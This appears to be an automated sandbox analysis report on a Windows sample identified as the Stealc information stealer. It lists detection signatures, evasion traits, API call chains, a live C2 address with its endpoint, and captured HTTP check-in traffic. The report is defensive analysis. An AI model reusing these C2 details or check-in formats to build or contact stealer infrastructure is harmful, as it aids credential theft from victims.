
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1558871
MD5: b3cec29dfcc248bc4f4f33ff5ba14470
SHA1: 389dc1f719b34841eaa55c8e81ce0f773fea3acf
SHA256: 841e3ab686e632551e2229d68366490832987ab47d308c54f6817f3e13a5ff52
Tags: exe user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B3CEC29DFCC248BC4F4F33FF5BA14470)
  • cleanup
Malware family
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Yara matches
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.1480967160.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 6524 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 6524 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Sigma
No Sigma rule has matched

Suricata IDS alerts
Timestamp: 2024-11-19T22:12:15.255016+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.8 | Source Port: 49706 | Destination IP: 185.215.113.206 | Destination Port: 80 | Protocol: TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.php/r | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/3 | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/= | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/ctionSettingsLMEM80 | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/tVersion | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpM | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php.j | Avira URL Cloud: Label: malware
Source: file.exe.6524.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004240B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00416960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00416B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409B80 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00407750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: O&.Pdb | source: file.exe
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00413910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00411250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00411269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00414B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00414B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00412390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 44 38 46 46 32 44 30 31 35 33 32 35 36 34 35 30 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a
    Data Ascii:
    ------IIEHJKJJJECFHJJJKKEC
    Content-Disposition: form-data; name="hwid"

    5A8D8FF2D0153256450765
    ------IIEHJKJJJECFHJJJKKEC
    Content-Disposition: form-data; name="build"

    mars
    ------IIEHJKJJJECFHJJJKKEC--
Source: Joe Sandbox View | IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (7 occurrences)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 44 38 46 46 32 44 30 31 35 33 32 35 36 34 35 30 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a
    Data Ascii:
    ------IIEHJKJJJECFHJJJKKEC
    Content-Disposition: form-data; name="hwid"

    5A8D8FF2D0153256450765
    ------IIEHJKJJJECFHJJJKKEC
    Content-Disposition: form-data; name="build"

    mars
    ------IIEHJKJJJECFHJJJKKEC--
Source: file.exe, 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1522326773.0000000001013000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1522326773.000000000101C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1522326773.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1522326773.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.j
Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/3
Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/=
Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/r
Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpM
Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ctionSettingsLMEM80
Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/n
Source: file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/tVersion
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00751822
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B9896
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004248B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0072093B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00701914
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C71ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B6239
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BEAD0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0089D340
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BB470
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C8CFE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C05D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007325B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0075E5BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B4709
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CA7BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C5797
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00404A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
